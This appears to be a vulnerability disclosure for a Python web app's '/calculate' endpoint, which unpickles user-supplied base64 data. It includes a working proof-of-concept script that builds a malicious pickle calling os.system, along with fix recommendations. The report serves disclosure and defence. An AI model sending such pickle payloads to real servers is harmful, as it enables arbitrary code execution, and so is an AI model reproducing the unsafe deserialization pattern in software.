### Key Information #### Vulnerability Overview - **Vulnerability Type**: Remote Code Execution (RCE) - **Affected Endpoint**: `/calculate` - **Cause**: Unsafe deserialization of user-provided data using Python's `pickle.loads`. #### Details - **Request Type**: Accepts POST requests containing `body_parts` and `point_cloud` fields. - **Encoding**: These fields are base64-encoded pickle objects. - **Issue**: Using `pickle.loads` to deserialize unvalidated data is inherently risky. Python’s `pickle` module is vulnerable to arbitrary code execution when deserializing untrusted data. - **Attack Method**: Attackers can craft malicious pickle payloads to execute arbitrary system commands on the server. #### Proof of Concept (PoC) 1. Start the server: ```bash python app.py ``` 2. Run poc.py: ```python import pickle import base64 import requests class Payload(object): def __reduce__(self): import os return (os.system, ('echo "PWNED"',)) def poc(): payload = pickle.dumps(Payload()) resp = requests.post( "http://127.0.0.1:5000/calculate", headers={"Content-Type": "application/x-www-form-urlencoded"}, data={ "body_parts": base64.b64encode(payload).decode(), "point_cloud": base64.b64encode(pickle.dumps(None)).decode() } ) print(resp.status_code, resp.text) if __name__ == "__main__": poc() ``` #### Impact - Successful exploitation allows attackers to execute arbitrary code on the server, potentially leading to full system compromise, data theft, or service disruption. #### Recommendations - Avoid using `pickle.loads` with data from untrusted sources. - Replace pickle with secure serialization formats (e.g., JSON). - Validate and sanitize all user input. #### References - [Python pickle Documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-considerations) - [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)